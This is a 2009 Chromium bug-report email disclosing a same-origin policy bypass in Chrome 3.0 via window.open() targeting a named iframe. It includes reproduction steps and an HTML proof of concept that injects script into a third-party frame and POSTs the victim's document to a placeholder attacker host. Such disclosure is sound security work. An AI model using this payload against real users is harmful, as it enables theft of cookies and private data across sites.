[chromium-bugs] Issue 30660 in chromium: window.open() Method Javascript Same-Origin Policy Violation

Thu, 17 Dec 2009 00:41:45 -0800 

Status: Unconfirmed
Owner: ----
Labels: Type-Bug Pri-2 OS-All Area-Misc

New issue 30660 by tokuji.akamine: window.open() Method Javascript  
Same-Origin Policy Violation
https://code.google.com/p/chromium/issues/detail?id=30660

Chrome Version       : Google Chrome    3.0.195.38 (Official Build 34131)
WebKit  532.0
V8      1.2.14.20
User Agent      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0

URLs (if applicable) :N/A
Other browsers tested:
   Add OK or FAIL after other browsers where you have tested this issue:
      Safari 4:OK
   Firefox 3.x:OK
          IE 7:OK
          IE 8:OK

What steps will reproduce the problem?
1. Invite the victim to the malicious content(please see below PoC) hosted
on the attacker's domain.
2. An iframe named "SOMENAME" in the malicious content loads data from a
third party domain.
3. The malicious content executes the JavaScript code in the window.open
method which targets "SOMENAME".
4. That JavaScript code in the window.open method is executed in the
context of the third party domain and can grab the victim's cookie and
other data from the third party domain and send these data to the
attacker's domain.
Before sending these data, Chrome sends "OPTIONS" method to confirm that
the attacker's site allows the cross domain request from the third party
site. If the attacker's site sends back the response which includes valid
"Access-Control-Allow-XXX" headers, Chrome makes a request which contains
the third party's content and cookie to the attacker's site.

What is the expected result?
Permission should be denied by same-origin policy.


What happens instead?
The attacker can bypass the same-origin policy to steal the victim's cookie
and other data from a third party domain via Chrome.


Please provide any additional information below. Attach a screenshot if
possible.

### PoC
<html>
<head>
<title>window.open() Method Javascript Same-Origin Policy Violation</title>
<script>
setTimeout("steal3rdPartyContent()",5000);

function steal3rdPartyContent(){
         try{
                 window.open("javascript:var x=new
XMLHttpRequest();x.open('POST','http://[attacker's
site]/');x.send(document);","SOMENAME");
         } catch(e) {alert(e)}
}
</script>
</head>
<body>
<iframe name="SOMENAME" src="http://[victim's site]/">
</body>
</html>

--
You received this message because you are listed in the owner
or CC fields of this issue, or because you starred this issue.
You may adjust your issue notification preferences at:
http://code.google.com/hosting/settings

-- 
Automated mail from issue updates at http://crbug.com/
Subscription options: http://groups.google.com/group/chromium-bugs

Reply via email to